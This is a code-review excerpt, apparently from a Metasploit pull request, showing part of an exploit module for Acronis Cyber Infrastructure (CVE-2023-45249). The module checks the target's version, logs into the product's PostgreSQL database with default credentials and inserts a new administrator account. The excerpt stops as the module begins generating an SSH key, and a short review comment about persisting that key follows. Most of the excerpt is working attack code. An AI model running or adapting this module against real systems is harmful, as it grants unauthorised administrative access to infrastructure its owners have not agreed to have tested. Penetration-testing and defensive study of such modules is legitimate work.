modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb

```diff
@@ -0,0 +1,338 @@
+  def get_aci_version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'ctype' => 'application/json',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
+    })
+
+    return unless res&.code == 200
+    return unless res.body.include?('storage-release')
+
+    # parse json response and get the version
+    res_json = res.get_json_document
+    return if res_json.blank?
+
+    version = res_json['storage-release']['version']
+    return if version.nil?
+
+    release = res_json['storage-release']['release']
+    return if release.nil?
+
+    "#{version}-#{release}".gsub(/[[:space:]]/, '')
+  end
+
+  def check
+    version_release = get_aci_version
+    return CheckCode::Unknown('Could not retrieve the version information.') if version_release.nil?
+    return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')
+
+    case version_release.split(/\.\d-/)[0]
+    when '5.0'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.0.1-61')
+    when '5.1'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.1.1-71')
+    when '5.2'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.2.1-69')
+    when '5.3'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.3.1-53')
+    when '5.4'
+      return CheckCode::Appears("Version #{version_release}") if Rex::Version.new(version_release) < Rex::Version.new('5.4.4-132')
+    end
+    CheckCode::Safe("Version #{version_release}")
+  end
+
+  def exploit
+    # connect to the PostgreSQL DB with default credentials
+    fail_with(Failure::Unreachable, "Can not connect to PostgreSQL DB on port #{datastore['DBPORT']}.") unless postgres_login({ port: datastore['DBPORT'] }) == :connected
+
+    # add a new admin user
+    username = Rex::Text.rand_text_alphanumeric(5..8).downcase
+    userid = SecureRandom.hex
+    password = Rex::Text.rand_password
+    print_status("Creating admin user #{username} with password #{password} for access at the Acronis Admin Portal.")
+    fail_with(Failure::BadConfig, "Adding admin credentials #{username}:#{password} failed.") unless add_admin_user(username, userid, password)
+
+    # Storing credentials in the msf database
+    if datastore['STORE_CRED']
+      print_status('Saving admin credentials at the msf database.')
+      store_valid_credential(user: username, private: password)
+    end
+
+    # log out from the postsgreSQL DB
+    postgres_logout if postgres_conn
+
+    # create SSH key pair
+    print_status('Creating SSH private and public key.')
+    k = SSHKey.generate
```

Comment:
Should we be persisting this key somewhere, also it would be nice if you could provide your own key as a datastore option.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19463/commits/8b197a60f95712265ba0d73aa44c7e1cad64a149.